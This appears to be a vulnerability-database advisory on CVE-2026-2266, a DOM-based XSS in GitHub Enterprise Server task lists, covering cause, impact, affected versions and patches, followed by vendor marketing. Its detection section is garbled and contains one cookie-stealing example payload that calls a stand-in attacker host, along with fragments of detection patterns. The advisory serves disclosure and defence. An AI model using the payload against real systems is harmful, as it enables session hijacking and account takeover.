
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2266 is a DOM-based cross-site scripting (XSS) vulnerability in GitHub Enterprise Server (GHES) that allows authenticated attackers to execute arbitrary scripts in the context of another user's browser session. The flaw exists in the task list content extraction logic, which fails to properly re-encode browser-decoded text nodes before rendering, enabling injection of user-supplied HTML. It affects all GHES versions prior to 3.20, specifically versions up to 3.18.5 and 3.19.0–3.19.2. The vulnerability was disclosed on March 10, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) and a CVSS v4.0 base score of 7.4 (High) (Feedly, GitHub 3.18 Release Notes, GitHub 3.19 Release Notes).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The task list content extraction logic in GHES renders browser-decoded text nodes without re-encoding them, allowing attacker-controlled HTML to be injected directly into the DOM. An authenticated attacker can craft malicious task list items within issues or pull requests; when another user views the affected content, the injected script executes in their browser session. Exploitation requires the attacker to have at least low-level authenticated access to the GHES instance and requires a victim user to interact with (view) the malicious content (Feedly, GitHub 3.18 Release Notes).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim user's browser session on the GHES instance. This can lead to session token theft, credential harvesting, unauthorized actions performed on behalf of the victim (such as modifying repositories, creating webhooks, or accessing private data), and potential lateral movement within the enterprise environment. Confidentiality and integrity are both impacted, though availability is not directly affected (Feedly).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2026-2266. The EPSS score is approximately 0.069%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. It was responsibly disclosed through the GitHub Bug Bounty program, and no threat actor attribution has been identified (Feedly).
- [ ] <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)> within the task list markdown.<, >, onerror, script, etc.) in stored content.onerror, onload, onclick), or <script> tags in the task list markdown.GitHub has released patched versions of GHES that address this vulnerability: 3.18.6 and 3.19.3. Administrators running any GHES version prior to 3.20 (specifically below 3.18.6 or between 3.19.0 and 3.19.2) should upgrade to the fixed releases immediately. No configuration-based workaround is documented; upgrading is the recommended and only confirmed remediation. GitHub Cloud (GitHub.com) is not affected (GitHub 3.18 Release Notes, GitHub 3.19 Release Notes).
The vulnerability was reported through the GitHub Bug Bounty program and disclosed by GitHub as part of their standard security advisory process. No notable independent researcher commentary, significant social media discussion, or major media coverage has been identified beyond standard CVE aggregator entries and vulnerability database listings (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."